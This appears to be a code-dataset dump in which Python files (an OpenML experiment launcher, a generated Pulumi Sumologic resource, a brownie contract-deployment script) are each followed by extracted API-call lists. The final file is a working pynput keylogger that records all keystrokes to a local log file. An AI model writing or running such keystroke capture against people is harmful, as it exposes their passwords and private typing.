Incorrectas')\n", (1705, 1741), False, 'from app import Response\n'), ((3649, 3676), 'app.Response', 'Response', ([], {'message': 'e.message'}), '(message=e.message)\n', (3657, 3676), False, 'from app import Response\n'), ((4925, 4952), 'app.Response', 'Response', ([], {'message': 'e.message'}), '(message=e.message)\n', (4933, 4952), False, 'from app import Response\n'), ((5544, 5571), 'app.Response', 'Response', ([], {'message': 'e.message'}), '(message=e.message)\n', (5552, 5571), False, 'from app import Response\n'), ((6518, 6545), 'app.Response', 'Response', ([], {'message': 'e.message'}), '(message=e.message)\n', (6526, 6545), False, 'from app import Response\n'), ((7229, 7256), 'app.Response', 'Response', ([], {'message': 'e.message'}), '(message=e.message)\n', (7237, 7256), False, 'from app import Response\n'), ((4075, 4102), 'app.Response', 'Response', ([], {'message': 'e.message'}), '(message=e.message)\n', (4083, 4102), False, 'from app import Response\n'), ((4298, 4325), 'app.Response', 'Response', ([], {'message': 'e.message'}), '(message=e.message)\n', (4306, 4325), False, 'from app import Response\n')] |
import arff
import argparse
import json
import logging
import numpy as np
import openmlcontrib
import openmldefaults
import os
import pandas as pd
# SSHFS NEMO FREIBURG:
# sshfs <EMAIL>:/rigel/home/jv2657/experiments ~/habanero_experiments
#
# SSHFS GRACE LEIDEN:
# ssh -f -N -L 1233:grace.liacs.nl:22 <EMAIL>
# sshfs -p 1233 vanrijn@localhost:/home/vanrijn/experiments ~/grace_experiments
def parse_args():
    """Build the command-line interface for the AR-vs-AT defaults experiment.

    Returns:
        argparse.Namespace: the parsed command-line arguments.
    """
    default_metadata = os.path.expanduser('../../data/text_classification.arff')
    cli = argparse.ArgumentParser(description='Creates an ARFF file')
    cli.add_argument('--output_directory', type=str, help='directory to store output',
                     default=os.path.expanduser('~/experiments/openml-defaults/at_vs_ar/'))
    cli.add_argument('--task_idx', type=int)
    cli.add_argument('--metadata_files', type=str, nargs='+', default=[default_metadata])
    cli.add_argument('--scoring', type=str, default='missclassification_rate')
    cli.add_argument('--search_space_identifier', type=str, default='ferreira')
    cli.add_argument('--minimize', action='store_true', default=True)
    cli.add_argument('--normalize_base', type=str, default=None)
    cli.add_argument('--normalize_a3r', type=str, default=None)
    cli.add_argument('--a3r_r', type=int, default=2)
    cli.add_argument('--aggregate', type=str, choices=openmldefaults.experiments.AGGREGATES, default='sum')
    cli.add_argument('--n_defaults', type=int, default=384)
    cli.add_argument('--n_estimators', type=int, default=64)
    cli.add_argument('--minimum_evals', type=int, default=128)
    cli.add_argument('--random_iterations', type=int, default=1)
    cli.add_argument('--run_on_surrogates', action='store_true', default=True)
    cli.add_argument('--task_limit', type=int, default=None, help='For speed')
    cli.add_argument('--task_id_column', default='dataset', type=str)
    cli.add_argument('--override_parameters', type=str)
    return cli.parse_args()
def run(args):
    """Collect task ids from the metadata files and launch the experiments.

    For every random seed and every selected task id, runs the vanilla
    surrogate experiment with AverageRank and ActiveTesting default models.

    Args:
        args: the argparse.Namespace produced by parse_args().
    """
    logger = logging.getLogger()
    logger.setLevel(logging.INFO)

    # Gather the union of all task ids mentioned in the metadata files.
    task_ids = None
    for metadata_path in args.metadata_files:
        with open(metadata_path, 'r') as handle:
            frame = openmlcontrib.meta.arff_to_dataframe(arff.load(handle), None)
        column = frame[args.task_id_column].values
        if task_ids is None:
            task_ids = np.sort(np.unique(column))
        else:
            task_ids = np.sort(np.unique(np.append(task_ids, column)))
    logging.info('Task ids: %s' % task_ids)

    # Either sweep all tasks or only the one selected on the command line.
    if args.task_idx is None:
        selected_tasks = task_ids
    else:
        selected_tasks = [task_ids[args.task_idx]]

    # Repeat the full sweep once per random seed.
    for seed in range(args.random_iterations):
        for task_id in selected_tasks:
            openmldefaults.experiments.run_vanilla_surrogates_on_task(
                task_id=task_id,
                models=[openmldefaults.models.AverageRankDefaults(), openmldefaults.models.ActiveTestingDefaults()],
                use_surrogates=False,
                random_seed=seed,
                search_space_identifier=args.search_space_identifier,
                metadata_files=args.metadata_files,
                scoring=args.scoring,
                minimize_measure=args.minimize,
                n_defaults=args.n_defaults,
                aggregate=args.aggregate,
                a3r_r=args.a3r_r,
                normalize_base=args.normalize_base,
                normalize_a3r=args.normalize_a3r,
                surrogate_n_estimators=args.n_estimators,
                surrogate_minimum_evals=args.minimum_evals,
                runtime_column='runtime',
                consider_a3r=True,
                evaluate_on_surrogate=args.run_on_surrogates,
                task_limit=args.task_limit,
                output_directory=args.output_directory,
                task_id_column=args.task_id_column,
                skip_row_check=True,
                override_parameters=json.loads(args.override_parameters) if args.override_parameters else None
            )
if __name__ == '__main__':
    # Turn pandas' chained-assignment warning into a hard error so silent
    # DataFrame mutation bugs surface immediately during the experiments.
    pd.options.mode.chained_assignment = 'raise'
    run(parse_args())
| [
"logging.getLogger",
"json.loads",
"numpy.unique",
"argparse.ArgumentParser",
"openmldefaults.models.AverageRankDefaults",
"arff.load",
"numpy.append",
"logging.info",
"os.path.expanduser",
"openmldefaults.models.ActiveTestingDefaults"
] | [((450, 507), 'os.path.expanduser', 'os.path.expanduser', (['"""../../data/text_classification.arff"""'], {}), "('../../data/text_classification.arff')\n", (468, 507), False, 'import os\n'), ((521, 580), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Creates an ARFF file"""'}), "(description='Creates an ARFF file')\n", (544, 580), False, 'import argparse\n'), ((2098, 2117), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (2115, 2117), False, 'import logging\n'), ((2561, 2600), 'logging.info', 'logging.info', (["('Task ids: %s' % task_ids)"], {}), "('Task ids: %s' % task_ids)\n", (2573, 2600), False, 'import logging\n'), ((703, 764), 'os.path.expanduser', 'os.path.expanduser', (['"""~/experiments/openml-defaults/at_vs_ar/"""'], {}), "('~/experiments/openml-defaults/at_vs_ar/')\n", (721, 764), False, 'import os\n'), ((2308, 2321), 'arff.load', 'arff.load', (['fp'], {}), '(fp)\n', (2317, 2321), False, 'import arff\n'), ((2397, 2438), 'numpy.unique', 'np.unique', (['df[args.task_id_column].values'], {}), '(df[args.task_id_column].values)\n', (2406, 2438), True, 'import numpy as np\n'), ((2503, 2554), 'numpy.append', 'np.append', (['task_ids', 'df[args.task_id_column].values'], {}), '(task_ids, df[args.task_id_column].values)\n', (2512, 2554), True, 'import numpy as np\n'), ((2988, 3031), 'openmldefaults.models.AverageRankDefaults', 'openmldefaults.models.AverageRankDefaults', ([], {}), '()\n', (3029, 3031), False, 'import openmldefaults\n'), ((3033, 3078), 'openmldefaults.models.ActiveTestingDefaults', 'openmldefaults.models.ActiveTestingDefaults', ([], {}), '()\n', (3076, 3078), False, 'import openmldefaults\n'), ((4072, 4108), 'json.loads', 'json.loads', (['args.override_parameters'], {}), '(args.override_parameters)\n', (4082, 4108), False, 'import json\n')] |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['CseInsightsResolutionArgs', 'CseInsightsResolution']
# NOTE: generated by the Pulumi tfgen tool; @pulumi.input_type introspects the
# declared properties, so the structure below must stay in its generated form.
@pulumi.input_type
class CseInsightsResolutionArgs:
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 parent: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a CseInsightsResolution resource.
        :param pulumi.Input[str] description: The description of the insights resolution.
        :param pulumi.Input[str] name: The name of the insights resolution.
        :param pulumi.Input[str] parent: The name of the built-in parent insights resolution. Supported values: "Resolved", "False Positive", "No Action", "Duplicate"
        """
        # Only store arguments that were actually supplied; pulumi.set routes
        # the values through the Pulumi runtime so Input/Output tracking works.
        if description is not None:
            pulumi.set(__self__, "description", description)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if parent is not None:
            pulumi.set(__self__, "parent", parent)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The description of the insights resolution.
        """
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the insights resolution.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def parent(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the built-in parent insights resolution. Supported values: "Resolved", "False Positive", "No Action", "Duplicate"
        """
        return pulumi.get(self, "parent")
    @parent.setter
    def parent(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "parent", value)
# NOTE: generated by the Pulumi tfgen tool. This state type mirrors
# CseInsightsResolutionArgs but is used for lookups (CseInsightsResolution.get)
# rather than for resource construction.
@pulumi.input_type
class _CseInsightsResolutionState:
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 parent: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering CseInsightsResolution resources.
        :param pulumi.Input[str] description: The description of the insights resolution.
        :param pulumi.Input[str] name: The name of the insights resolution.
        :param pulumi.Input[str] parent: The name of the built-in parent insights resolution. Supported values: "Resolved", "False Positive", "No Action", "Duplicate"
        """
        # Only store properties that were actually supplied; pulumi.set routes
        # the values through the Pulumi runtime so Input/Output tracking works.
        if description is not None:
            pulumi.set(__self__, "description", description)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if parent is not None:
            pulumi.set(__self__, "parent", parent)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The description of the insights resolution.
        """
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the insights resolution.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def parent(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the built-in parent insights resolution. Supported values: "Resolved", "False Positive", "No Action", "Duplicate"
        """
        return pulumi.get(self, "parent")
    @parent.setter
    def parent(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "parent", value)
class CseInsightsResolution(pulumi.CustomResource):
    # Generated resource class: the two @overload __init__ stubs exist only
    # for type checkers; the real constructor is the untyped __init__ below.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 parent: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Provides a Sumologic CSE Insights Resolution. When an insight gets closed, a resolution indicates why it got closed.
        ## Example Usage
        ```python
        import pulumi
        import pulumi_sumologic as sumologic
        insights_resolution = sumologic.CseInsightsResolution("insightsResolution",
            description="New description",
            parent="No Action")
        ```
        ## Import
        Insights Resolution can be imported using the field id, e.g.hcl
        ```sh
         $ pulumi import sumologic:index/cseInsightsResolution:CseInsightsResolution insights_resolution id
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: The description of the insights resolution.
        :param pulumi.Input[str] name: The name of the insights resolution.
        :param pulumi.Input[str] parent: The name of the built-in parent insights resolution. Supported values: "Resolved", "False Positive", "No Action", "Duplicate"
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: Optional[CseInsightsResolutionArgs] = None,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a Sumologic CSE Insights Resolution. When an insight gets closed, a resolution indicates why it got closed.
        ## Example Usage
        ```python
        import pulumi
        import pulumi_sumologic as sumologic
        insights_resolution = sumologic.CseInsightsResolution("insightsResolution",
            description="New description",
            parent="No Action")
        ```
        ## Import
        Insights Resolution can be imported using the field id, e.g.hcl
        ```sh
         $ pulumi import sumologic:index/cseInsightsResolution:CseInsightsResolution insights_resolution id
        ```
        :param str resource_name: The name of the resource.
        :param CseInsightsResolutionArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Accept either (args_object, opts) or keyword arguments and forward
        # both shapes to the single _internal_init implementation.
        resource_args, opts = _utilities.get_resource_args_opts(CseInsightsResolutionArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 parent: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        # __props__ is only pre-populated when rehydrating an existing resource
        # (opts.id set, e.g. via the static get()); for a fresh resource the
        # props object is built here from the constructor arguments.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = CseInsightsResolutionArgs.__new__(CseInsightsResolutionArgs)
            __props__.__dict__["description"] = description
            __props__.__dict__["name"] = name
            __props__.__dict__["parent"] = parent
        super(CseInsightsResolution, __self__).__init__(
            'sumologic:index/cseInsightsResolution:CseInsightsResolution',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            description: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            parent: Optional[pulumi.Input[str]] = None) -> 'CseInsightsResolution':
        """
        Get an existing CseInsightsResolution resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: The description of the insights resolution.
        :param pulumi.Input[str] name: The name of the insights resolution.
        :param pulumi.Input[str] parent: The name of the built-in parent insights resolution. Supported values: "Resolved", "False Positive", "No Action", "Duplicate"
        """
        # Merging a ResourceOptions carrying the provider id makes the
        # constructor take the rehydration path in _internal_init.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _CseInsightsResolutionState.__new__(_CseInsightsResolutionState)
        __props__.__dict__["description"] = description
        __props__.__dict__["name"] = name
        __props__.__dict__["parent"] = parent
        return CseInsightsResolution(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[Optional[str]]:
        """
        The description of the insights resolution.
        """
        return pulumi.get(self, "description")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name of the insights resolution.
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter
    def parent(self) -> pulumi.Output[Optional[str]]:
        """
        The name of the built-in parent insights resolution. Supported values: "Resolved", "False Positive", "No Action", "Duplicate"
        """
        return pulumi.get(self, "parent")
| [
"pulumi.set",
"pulumi.ResourceOptions",
"pulumi.get"
] | [((1542, 1573), 'pulumi.get', 'pulumi.get', (['self', '"""description"""'], {}), "(self, 'description')\n", (1552, 1573), False, 'import pulumi\n'), ((1670, 1708), 'pulumi.set', 'pulumi.set', (['self', '"""description"""', 'value'], {}), "(self, 'description', value)\n", (1680, 1708), False, 'import pulumi\n'), ((1878, 1902), 'pulumi.get', 'pulumi.get', (['self', '"""name"""'], {}), "(self, 'name')\n", (1888, 1902), False, 'import pulumi\n'), ((1985, 2016), 'pulumi.set', 'pulumi.set', (['self', '"""name"""', 'value'], {}), "(self, 'name', value)\n", (1995, 2016), False, 'import pulumi\n'), ((2277, 2303), 'pulumi.get', 'pulumi.get', (['self', '"""parent"""'], {}), "(self, 'parent')\n", (2287, 2303), False, 'import pulumi\n'), ((2390, 2423), 'pulumi.set', 'pulumi.set', (['self', '"""parent"""', 'value'], {}), "(self, 'parent', value)\n", (2400, 2423), False, 'import pulumi\n'), ((3584, 3615), 'pulumi.get', 'pulumi.get', (['self', '"""description"""'], {}), "(self, 'description')\n", (3594, 3615), False, 'import pulumi\n'), ((3712, 3750), 'pulumi.set', 'pulumi.set', (['self', '"""description"""', 'value'], {}), "(self, 'description', value)\n", (3722, 3750), False, 'import pulumi\n'), ((3920, 3944), 'pulumi.get', 'pulumi.get', (['self', '"""name"""'], {}), "(self, 'name')\n", (3930, 3944), False, 'import pulumi\n'), ((4027, 4058), 'pulumi.set', 'pulumi.set', (['self', '"""name"""', 'value'], {}), "(self, 'name', value)\n", (4037, 4058), False, 'import pulumi\n'), ((4319, 4345), 'pulumi.get', 'pulumi.get', (['self', '"""parent"""'], {}), "(self, 'parent')\n", (4329, 4345), False, 'import pulumi\n'), ((4432, 4465), 'pulumi.set', 'pulumi.set', (['self', '"""parent"""', 'value'], {}), "(self, 'parent', value)\n", (4442, 4465), False, 'import pulumi\n'), ((10508, 10539), 'pulumi.get', 'pulumi.get', (['self', '"""description"""'], {}), "(self, 'description')\n", (10518, 10539), False, 'import pulumi\n'), ((10700, 10724), 'pulumi.get', 'pulumi.get', (['self', 
'"""name"""'], {}), "(self, 'name')\n", (10710, 10724), False, 'import pulumi\n'), ((10986, 11012), 'pulumi.get', 'pulumi.get', (['self', '"""parent"""'], {}), "(self, 'parent')\n", (10996, 11012), False, 'import pulumi\n'), ((1152, 1200), 'pulumi.set', 'pulumi.set', (['__self__', '"""description"""', 'description'], {}), "(__self__, 'description', description)\n", (1162, 1200), False, 'import pulumi\n'), ((1242, 1276), 'pulumi.set', 'pulumi.set', (['__self__', '"""name"""', 'name'], {}), "(__self__, 'name', name)\n", (1252, 1276), False, 'import pulumi\n'), ((1320, 1358), 'pulumi.set', 'pulumi.set', (['__self__', '"""parent"""', 'parent'], {}), "(__self__, 'parent', parent)\n", (1330, 1358), False, 'import pulumi\n'), ((3194, 3242), 'pulumi.set', 'pulumi.set', (['__self__', '"""description"""', 'description'], {}), "(__self__, 'description', description)\n", (3204, 3242), False, 'import pulumi\n'), ((3284, 3318), 'pulumi.set', 'pulumi.set', (['__self__', '"""name"""', 'name'], {}), "(__self__, 'name', name)\n", (3294, 3318), False, 'import pulumi\n'), ((3362, 3400), 'pulumi.set', 'pulumi.set', (['__self__', '"""parent"""', 'parent'], {}), "(__self__, 'parent', parent)\n", (3372, 3400), False, 'import pulumi\n'), ((7938, 7962), 'pulumi.ResourceOptions', 'pulumi.ResourceOptions', ([], {}), '()\n', (7960, 7962), False, 'import pulumi\n'), ((9978, 10007), 'pulumi.ResourceOptions', 'pulumi.ResourceOptions', ([], {'id': 'id'}), '(id=id)\n', (10000, 10007), False, 'import pulumi\n')] |
from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network
from brownie.network import max_fee, priority_fee
def main():
    """Deploy PACDaoBonus1 with network-specific token lists and accounts.

    Selects the token addresses, the deployer account, the beneficiary and
    whether to publish the source code based on the active brownie network.

    Returns:
        The deployed PACDaoBonus1 contract instance.
    """
    publish_source = True
    multisig = "0xf27AC88ac7e80487f21e5c2C847290b2AE5d7B8e"
    beneficiary_address = multisig
    # Hoist the repeated network.show_active() lookups into one local.
    active = network.show_active()

    if active in ["development"]:
        tokens = [ZERO_ADDRESS]
        deployer = accounts[0]
        publish_source = False
        beneficiary_address = deployer
    elif active == "rinkeby":
        # Fix: the original code assigned a first, three-entry token list here
        # that was immediately overwritten by the list below; the dead
        # assignment has been removed.
        tokens = [
            "<KEY>",  # Founder
            "0xE60A7825A80509DE847Ffe30ce2936dfc770DB6b",  # Common
            "<KEY>",  # Uncommon
            "0xd56c12efd06252f1f0098a8fe517da286245c0a8",  # Rare
            "<KEY>",  # Gov
        ]
        deployer = accounts.load("husky")
        beneficiary_address = deployer
        publish_source = True
    elif active in ["mainnet", "mainnet-fork"]:
        tokens = [
            "<KEY>",  # Founder
            "0xE60A7825A80509DE847Ffe30ce2936dfc770DB6b",  # Common
            "<KEY>",  # Uncommon
            "0xd56c12efd06252f1f0098a8fe517da286245c0a8",  # Rare
            "<KEY>",  # Gov
        ]
        if active == "mainnet-fork":
            # Fix: previously this fork setup was clobbered by a trailing
            # `else` branch that reloaded the "husky" account and re-enabled
            # source publishing, so forks tried to publish with the wrong
            # account. The if/elif chain keeps the fork settings in effect.
            publish_source = False
            deployer = accounts[0]
        else:  # active == "mainnet"
            deployer = accounts.load("minnow")
            max_fee(input("Max fee in gwei: ") + " gwei")
            priority_fee("2 gwei")
            publish_source = True

    return PACDaoBonus1.deploy(
        beneficiary_address, tokens, {"from": deployer}, publish_source=publish_source
    )
| [
"brownie.network.show_active",
"brownie.network.priority_fee",
"brownie.PACDaoBonus1.deploy",
"brownie.accounts.load"
] | [((1771, 1874), 'brownie.PACDaoBonus1.deploy', 'PACDaoBonus1.deploy', (['beneficiary_address', 'tokens', "{'from': deployer}"], {'publish_source': 'publish_source'}), "(beneficiary_address, tokens, {'from': deployer},\n publish_source=publish_source)\n", (1790, 1874), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((259, 280), 'brownie.network.show_active', 'network.show_active', ([], {}), '()\n', (278, 280), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((444, 465), 'brownie.network.show_active', 'network.show_active', ([], {}), '()\n', (463, 465), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((922, 944), 'brownie.accounts.load', 'accounts.load', (['"""husky"""'], {}), "('husky')\n", (935, 944), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((1023, 1044), 'brownie.network.show_active', 'network.show_active', ([], {}), '()\n', (1042, 1044), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((1706, 1728), 'brownie.accounts.load', 'accounts.load', (['"""husky"""'], {}), "('husky')\n", (1719, 1728), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((1345, 1366), 'brownie.network.show_active', 'network.show_active', ([], {}), '()\n', (1364, 1366), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((1467, 1488), 'brownie.network.show_active', 'network.show_active', ([], {}), '()\n', (1486, 1488), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((1526, 1549), 'brownie.accounts.load', 'accounts.load', (['"""minnow"""'], {}), "('minnow')\n", (1539, 1549), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((1620, 1642), 'brownie.network.priority_fee', 'priority_fee', (['"""2 gwei"""'], {}), "('2 gwei')\n", (1632, 1642), False, 'from brownie.network import max_fee, priority_fee\n')] |
import pynput
from pynput.keyboard import Key, Listener
count = 0  # number of keystrokes buffered since the last flush to disk
keys = []  # buffered key events waiting to be written by write_file()
def on_press(key):
    """Buffer one keystroke; flush the buffer to disk every few presses."""
    global keys, count
    keys.append(key)
    count += 1
    print("{0} key pressed on keyboard".format(key))
    if count < 4:
        return
    # Buffer threshold reached: persist the captured keys and start over.
    # The threshold controls how often the log file on disk is updated.
    count = 0
    write_file(keys)
    keys = []
def write_file(keys):
    """Append the captured keystrokes to keylog.txt.

    Each key's string form has its surrounding quotes stripped; the space
    key is translated into a newline, every other key is written verbatim,
    producing a clean, readable log file.
    """
    with open("keylog.txt", "a") as f:
        for key in keys:
            k = str(key).replace("'", "")
            if k.find("space") > 0:
                # Space acts as a line separator in the log.
                f.write('\n')
            else:
                # Bug fix: the original only handled the space key, so the
                # actual keystrokes were never written to the log at all.
                f.write(k)
def on_release(key):
    """Stop the keylogger when the kill-switch key is released."""
    # pynput stops the listener when a callback returns False; Escape (esc)
    # is the configured key that ends the script.
    return False if key == Key.esc else None
# Start the keyboard listener and block the main thread until on_release
# returns False (i.e. until the Escape key is released).
with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()
# Made by Damien/GunFighterMan101
# I really tried with this one don't heckle me because it's broken. Fix it if you are so upset. Thanks for understanding, 73.
| [
"pynput.keyboard.Listener"
] | [((835, 885), 'pynput.keyboard.Listener', 'Listener', ([], {'on_press': 'on_press', 'on_release': 'on_release'}), '(on_press=on_press, on_release=on_release)\n', (843, 885), False, 'from pynput.keyboard import Key, Listener\n')] |